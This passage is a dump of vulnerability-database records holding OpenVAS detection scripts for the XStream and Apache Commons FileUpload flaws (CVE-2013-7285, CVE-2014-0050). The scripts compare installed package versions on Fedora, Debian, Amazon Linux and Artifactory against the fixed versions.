isrpmvuln(pkg:\"xstream\", rpm:\"xstream~1.3.1~5.1.fc19\", rls:\"FC19\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-05-29T18:37:28", "bulletinFamily": "scanner", "cvelist": ["CVE-2013-7285"], "description": "The remote host is missing an update for the ", "modified": "2019-03-15T00:00:00", "published": "2014-02-25T00:00:00", "id": "OPENVAS:1361412562310867544", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310867544", "type": "openvas", "title": "Fedora Update for xstream FEDORA-2014-2372", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for xstream FEDORA-2014-2372\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2014 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.867544\");\n script_version(\"$Revision: 14223 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-15 14:49:35 +0100 (Fri, 15 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2014-02-25 16:33:30 +0530 (Tue, 25 Feb 2014)\");\n script_cve_id(\"CVE-2013-7285\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_name(\"Fedora Update for xstream FEDORA-2014-2372\");\n script_tag(name:\"affected\", value:\"xstream on Fedora 20\");\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_xref(name:\"FEDORA\", value:\"2014-2372\");\n script_xref(name:\"URL\", value:\"https://lists.fedoraproject.org/pipermail/package-announce/2014-February/128807.html\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'xstream'\n package(s) announced via the referenced advisory.\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2014 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\", re:\"ssh/login/release=FC20\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"FC20\")\n{\n\n if ((res = 
isrpmvuln(pkg:\"xstream\", rpm:\"xstream~1.3.1~9.fc20\", rls:\"FC20\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2017-07-25T10:48:47", "bulletinFamily": "scanner", "cvelist": ["CVE-2013-7285"], "description": "Check for the Version of xstream", "modified": "2017-07-10T00:00:00", "published": "2014-02-25T00:00:00", "id": "OPENVAS:867530", "href": "http://plugins.openvas.org/nasl.php?oid=867530", "type": "openvas", "title": "Fedora Update for xstream FEDORA-2014-2340", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for xstream FEDORA-2014-2340\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2014 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\n\nif(description)\n{\n script_id(867530);\n script_version(\"$Revision: 6629 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-10 08:33:41 +0200 (Mon, 10 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2014-02-25 16:08:23 +0530 (Tue, 25 Feb 2014)\");\n script_cve_id(\"CVE-2013-7285\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_name(\"Fedora Update for xstream FEDORA-2014-2340\");\n\n tag_insight = \"XStream is a simple library to serialize objects to XML\nand back again. A high level facade is supplied that\nsimplifies common use cases. Custom objects can be serialized\nwithout need for specifying mappings. Speed and low memory\nfootprint are a crucial part of the design, making it suitable\nfor large object graphs or systems with high message throughput.\nNo information is duplicated that can be obtained via reflection.\nThis results in XML that is easier to read for humans and more\ncompact than native Java serialization. XStream serializes internal\nfields, including private and final. Supports non-public and inner\nclasses. Classes are not required to have default constructor.\nDuplicate references encountered in the object-model will be\nmaintained. Supports circular references. By implementing an\ninterface, XStream can serialize directly to/from any tree\nstructure (not just XML). 
Strategies can be registered allowing\ncustomization of how particular types are represented as XML.\nWhen an exception occurs due to malformed XML, detailed diagnostics\nare provided to help isolate and fix the problem.\n\";\n\n tag_affected = \"xstream on Fedora 19\";\n\n tag_solution = \"Please Install the Updated Packages.\";\n\n\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_xref(name: \"FEDORA\", value: \"2014-2340\");\n script_xref(name: \"URL\" , value: \"https://lists.fedoraproject.org/pipermail/package-announce/2014-February/128864.html\");\n script_summary(\"Check for the Version of xstream\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2014 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"FC19\")\n{\n\n if ((res = isrpmvuln(pkg:\"xstream\", rpm:\"xstream~1.3.1~5.1.fc19\", rls:\"FC19\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}", "cvss": {"score": 5.5, "vector": "AV:NETWORK/AC:MEDIUM/Au:UNKNOWN/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2017-07-25T10:48:17", "bulletinFamily": "scanner", "cvelist": ["CVE-2013-7285"], "description": "Check for the Version of xstream", "modified": "2017-07-10T00:00:00", "published": "2014-02-25T00:00:00", "id": "OPENVAS:867544", "href": "http://plugins.openvas.org/nasl.php?oid=867544", "type": "openvas", "title": "Fedora Update for xstream FEDORA-2014-2372", 
"sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for xstream FEDORA-2014-2372\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2014 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\n\nif(description)\n{\n script_id(867544);\n script_version(\"$Revision: 6629 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-10 08:33:41 +0200 (Mon, 10 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2014-02-25 16:33:30 +0530 (Tue, 25 Feb 2014)\");\n script_cve_id(\"CVE-2013-7285\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_name(\"Fedora Update for xstream FEDORA-2014-2372\");\n\n tag_insight = \"XStream is a simple library to serialize objects to XML\nand back again. A high level facade is supplied that\nsimplifies common use cases. Custom objects can be serialized\nwithout need for specifying mappings. 
Speed and low memory\nfootprint are a crucial part of the design, making it suitable\nfor large object graphs or systems with high message throughput.\nNo information is duplicated that can be obtained via reflection.\nThis results in XML that is easier to read for humans and more\ncompact than native Java serialization. XStream serializes internal\nfields, including private and final. Supports non-public and inner\nclasses. Classes are not required to have default constructor.\nDuplicate references encountered in the object-model will be\nmaintained. Supports circular references. By implementing an\ninterface, XStream can serialize directly to/from any tree\nstructure (not just XML). Strategies can be registered allowing\ncustomization of how particular types are represented as XML.\nWhen an exception occurs due to malformed XML, detailed diagnostics\nare provided to help isolate and fix the problem.\n\";\n\n tag_affected = \"xstream on Fedora 20\";\n\n tag_solution = \"Please Install the Updated Packages.\";\n\n\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_xref(name: \"FEDORA\", value: \"2014-2372\");\n script_xref(name: \"URL\" , value: \"https://lists.fedoraproject.org/pipermail/package-announce/2014-February/128807.html\");\n script_summary(\"Check for the Version of xstream\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2014 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == 
\"FC20\")\n{\n\n if ((res = isrpmvuln(pkg:\"xstream\", rpm:\"xstream~1.3.1~9.fc20\", rls:\"FC20\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}", "cvss": {"score": 5.5, "vector": "AV:NETWORK/AC:MEDIUM/Au:UNKNOWN/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2019-05-29T18:37:16", "bulletinFamily": "scanner", "cvelist": ["CVE-2013-7285"], "description": "Artifactory is prone to a remote code-execution vulnerability.", "modified": "2019-05-21T00:00:00", "published": "2014-03-13T00:00:00", "id": "OPENVAS:1361412562310103919", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310103919", "type": "openvas", "title": "Artifactory XStream Remote Code Execution Vulnerability", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Artifactory XStream Remote Code Execution Vulnerability\n#\n# Authors:\n# Michael Meyer <michael.meyer@greenbone.net>\n#\n# Copyright:\n# Copyright (c) 2014 Greenbone Networks GmbH\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\nCPE = \"cpe:/a:jfrog:artifactory\";\n\nif (description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.103919\");\n script_bugtraq_id(64760);\n script_cve_id(\"CVE-2013-7285\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_version(\"2019-05-21T14:04:10+0000\");\n\n script_name(\"Artifactory XStream Remote Code Execution Vulnerability\");\n\n script_xref(name:\"URL\", value:\"http://www.securityfocus.com/bid/64760\");\n script_xref(name:\"URL\", value:\"http://www.jfrog.com/confluence/display/RTF/Artifactory+3.1.1\");\n\n script_tag(name:\"last_modification\", value:\"2019-05-21 14:04:10 +0000 (Tue, 21 May 2019)\");\n script_tag(name:\"creation_date\", value:\"2014-03-13 10:30:44 +0100 (Thu, 13 Mar 2014)\");\n script_category(ACT_GATHER_INFO);\n script_tag(name:\"qod_type\", value:\"remote_banner\");\n script_family(\"Web application abuses\");\n script_copyright(\"This script is Copyright (C) 2014 Greenbone Networks GmbH\");\n script_dependencies(\"gb_artifactory_detect.nasl\");\n script_require_ports(\"Services/www\", 80);\n script_mandatory_keys(\"artifactory/installed\");\n\n script_tag(name:\"impact\", value:\"Successfully exploiting this issue may allow an attacker to execute\narbitrary code in the context of the user running the affected\napplication.\");\n script_tag(name:\"vuldetect\", value:\"Check the installed version.\");\n script_tag(name:\"insight\", value:\"Artifactory prior to version 3.1.1.1 using a XStream library\nwhich is prone to a remote code execution vulnerability.\");\n script_tag(name:\"solution\", value:\"Update 
to Artifactory 3.1.1.1\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"summary\", value:\"Artifactory is prone to a remote code-execution vulnerability.\");\n script_tag(name:\"affected\", value:\"Artifactory < 3.1.1.1\");\n\n exit(0);\n}\n\ninclude(\"host_details.inc\");\ninclude(\"version_func.inc\");\n\nif( ! port = get_app_port( cpe:CPE) ) exit( 0 );\nif( vers = get_app_version( cpe:CPE, port:port ) )\n{\n if( version_is_less( version: vers, test_version: \"3.1.1.1\" ) )\n {\n report = 'Installed version: ' + vers + '\\nFixed version: 3.1.1.1';\n\n security_message( port:port, data:report );\n exit(0);\n }\n}\n\nexit(0);\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2017-07-25T10:48:25", "bulletinFamily": "scanner", "cvelist": ["CVE-2014-0050"], "description": "Check for the Version of apache-commons-fileupload", "modified": "2017-07-10T00:00:00", "published": "2014-02-20T00:00:00", "id": "OPENVAS:867523", "href": "http://plugins.openvas.org/nasl.php?oid=867523", "type": "openvas", "title": "Fedora Update for apache-commons-fileupload FEDORA-2014-2175", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for apache-commons-fileupload FEDORA-2014-2175\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2014 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\n\nif(description)\n{\n script_id(867523);\n script_version(\"$Revision: 6629 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-10 08:33:41 +0200 (Mon, 10 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2014-02-20 15:08:39 +0530 (Thu, 20 Feb 2014)\");\n script_cve_id(\"CVE-2014-0050\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_name(\"Fedora Update for apache-commons-fileupload FEDORA-2014-2175\");\n\n tag_insight = \"The javax.servlet package lacks support for rfc 1867, html file\nupload. This package provides a simple to use api for working with\nsuch data. 
The scope of this package is to create a package of Java\nutility classes to read multipart/form-data within a\njavax.servlet.http.HttpServletRequest\n\";\n\n tag_affected = \"apache-commons-fileupload on Fedora 20\";\n\n tag_solution = \"Please Install the Updated Packages.\";\n\n\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_xref(name: \"FEDORA\", value: \"2014-2175\");\n script_xref(name: \"URL\" , value: \"https://lists.fedoraproject.org/pipermail/package-announce/2014-February/128499.html\");\n script_summary(\"Check for the Version of apache-commons-fileupload\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2014 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"FC20\")\n{\n\n if ((res = isrpmvuln(pkg:\"apache-commons-fileupload\", rpm:\"apache-commons-fileupload~1.3~5.fc20\", rls:\"FC20\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2017-07-26T08:48:50", "bulletinFamily": "scanner", "cvelist": ["CVE-2014-0050"], "description": "It was discovered that the Apache Commons FileUpload package for Java\ncould enter an infinite loop while processing a multipart request with\na crafted Content-Type, resulting in a denial-of-service condition.", "modified": "2017-07-11T00:00:00", "published": 
"2014-02-07T00:00:00", "id": "OPENVAS:702856", "href": "http://plugins.openvas.org/nasl.php?oid=702856", "type": "openvas", "title": "Debian Security Advisory DSA 2856-1 (libcommons-fileupload-java - denial of service)", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: deb_2856.nasl 6663 2017-07-11 09:58:05Z teissa $\n# Auto-generated from advisory DSA 2856-1 using nvtgen 1.0\n# Script version: 1.0\n#\n# Author:\n# Greenbone Networks\n#\n# Copyright:\n# Copyright (c) 2014 Greenbone Networks GmbH http://greenbone.net\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ntag_affected = \"libcommons-fileupload-java on Debian Linux\";\ntag_insight = \"The Commons FileUpload package makes it easy to add robust, high-performance,\nfile upload capability to your servlets and web applications.\";\ntag_solution = \"For the oldstable distribution (squeeze), this problem has been fixed in\nversion 1.2.2-1+deb6u2.\n\nFor the stable distribution (wheezy), this problem has been fixed in\nversion 1.2.2-1+deb7u2.\n\nFor the unstable distribution (sid), this problem has been fixed in\nversion 1.3.1-1.\n\nWe recommend that you upgrade your libcommons-fileupload-java packages.\";\ntag_summary = \"It was discovered that the Apache Commons FileUpload package for Java\ncould enter an infinite loop while processing a multipart request with\na crafted Content-Type, resulting in a denial-of-service condition.\";\ntag_vuldetect = \"This check tests the installed software version using the apt package manager.\";\n\nif(description)\n{\n script_id(702856);\n script_version(\"$Revision: 6663 $\");\n script_cve_id(\"CVE-2014-0050\");\n script_name(\"Debian Security Advisory DSA 2856-1 (libcommons-fileupload-java - denial of service)\");\n script_tag(name: \"last_modification\", value:\"$Date: 2017-07-11 11:58:05 +0200 (Tue, 11 Jul 2017) $\");\n script_tag(name: \"creation_date\", value:\"2014-02-07 00:00:00 +0100 (Fri, 07 Feb 2014)\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n\n script_xref(name: \"URL\", value: \"http://www.debian.org/security/2014/dsa-2856.html\");\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2014 Greenbone Networks GmbH http://greenbone.net\");\n 
script_family(\"Debian Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/debian_linux\", \"ssh/login/packages\");\n script_tag(name: \"affected\", value: tag_affected);\n script_tag(name: \"insight\", value: tag_insight);\n# script_tag(name: \"impact\", value: tag_impact);\n script_tag(name: \"solution\", value: tag_solution);\n script_tag(name: \"summary\", value: tag_summary);\n script_tag(name: \"vuldetect\", value: tag_vuldetect);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-deb.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = isdpkgvuln(pkg:\"libcommons-fileupload-java\", ver:\"1.2.2-1+deb6u2\", rls:\"DEB6.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libcommons-fileupload-java-doc\", ver:\"1.2.2-1+deb6u2\", rls:\"DEB6.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libcommons-fileupload-java\", ver:\"1.2.2-1+deb7u2\", rls:\"DEB7.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libcommons-fileupload-java-doc\", ver:\"1.2.2-1+deb7u2\", rls:\"DEB7.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libcommons-fileupload-java\", ver:\"1.2.2-1+deb7u2\", rls:\"DEB7.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libcommons-fileupload-java-doc\", ver:\"1.2.2-1+deb7u2\", rls:\"DEB7.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libcommons-fileupload-java\", ver:\"1.2.2-1+deb7u2\", rls:\"DEB7.2\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libcommons-fileupload-java-doc\", ver:\"1.2.2-1+deb7u2\", rls:\"DEB7.2\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libcommons-fileupload-java\", ver:\"1.2.2-1+deb7u2\", rls:\"DEB7.3\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libcommons-fileupload-java-doc\", 
ver:\"1.2.2-1+deb7u2\", rls:\"DEB7.3\")) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2020-03-17T23:01:09", "bulletinFamily": "scanner", "cvelist": ["CVE-2014-0050"], "description": "The remote host is missing an update announced via the referenced Security Advisory.", "modified": "2020-03-13T00:00:00", "published": "2015-09-08T00:00:00", "id": "OPENVAS:1361412562310120359", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310120359", "type": "openvas", "title": "Amazon Linux: Security Advisory (ALAS-2014-312)", "sourceData": "# Copyright (C) 2015 Eero Volotinen\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (C) of their respective author(s)\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.120359\");\n script_version(\"2020-03-13T13:19:50+0000\");\n script_tag(name:\"creation_date\", value:\"2015-09-08 13:24:34 +0200 (Tue, 08 Sep 2015)\");\n script_tag(name:\"last_modification\", value:\"2020-03-13 13:19:50 +0000 (Fri, 13 Mar 2020)\");\n script_name(\"Amazon Linux: Security Advisory (ALAS-2014-312)\");\n script_tag(name:\"insight\", value:\"MultipartStream.java in Apache Commons FileUpload before 1.3.1, as used in Apache Tomcat, JBoss Web, and other products, allows remote attackers to cause a denial of service (infinite loop and CPU consumption) via a crafted Content-Type header that bypasses a loop's intended exit conditions.\");\n script_tag(name:\"solution\", value:\"Run yum update tomcat7 to update your system.\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_xref(name:\"URL\", value:\"https://alas.aws.amazon.com/ALAS-2014-312.html\");\n script_cve_id(\"CVE-2014-0050\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/amazon_linux\", \"ssh/login/release\");\n script_category(ACT_GATHER_INFO);\n script_tag(name:\"summary\", value:\"The remote host is missing an update announced via the referenced Security Advisory.\");\n script_copyright(\"Copyright (C) 2015 Eero Volotinen\");\n script_family(\"Amazon Linux Local Security Checks\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = 
\"\";\nreport = \"\";\n\nif(release == \"AMAZON\") {\n if(!isnull(res = isrpmvuln(pkg:\"tomcat7-docs-webapp\", rpm:\"tomcat7-docs-webapp~7.0.47~1.38.amzn1\", rls:\"AMAZON\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"tomcat7\", rpm:\"tomcat7~7.0.47~1.38.amzn1\", rls:\"AMAZON\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"tomcat7-lib\", rpm:\"tomcat7-lib~7.0.47~1.38.amzn1\", rls:\"AMAZON\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"tomcat7-webapps\", rpm:\"tomcat7-webapps~7.0.47~1.38.amzn1\", rls:\"AMAZON\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"tomcat7-el-2.2-api\", rpm:\"tomcat7-el-2.2-api~7.0.47~1.38.amzn1\", rls:\"AMAZON\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"tomcat7-javadoc\", rpm:\"tomcat7-javadoc~7.0.47~1.38.amzn1\", rls:\"AMAZON\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"tomcat7-jsp-2.2-api\", rpm:\"tomcat7-jsp-2.2-api~7.0.47~1.38.amzn1\", rls:\"AMAZON\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"tomcat7-admin-webapps\", rpm:\"tomcat7-admin-webapps~7.0.47~1.38.amzn1\", rls:\"AMAZON\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"tomcat7-servlet-3.0-api\", rpm:\"tomcat7-servlet-3.0-api~7.0.47~1.38.amzn1\", rls:\"AMAZON\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"tomcat7\", rpm:\"tomcat7~7.0.47~1.38.amzn1\", rls:\"AMAZON\"))) {\n report += res;\n }\n\n if(report != \"\") {\n security_message(data:report);\n } else if(__pkg_match) {\n exit(99);\n }\n exit(0);\n}\n\nexit(0);\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-05-29T18:37:37", "bulletinFamily": "scanner", "cvelist": ["CVE-2014-0050"], "description": "This host is running Apache Tomcat and is prone to denial of service\n vulnerability.", "modified": "2019-05-10T00:00:00", "published": "2014-03-24T00:00:00", "id": "OPENVAS:1361412562310804251", "href": 
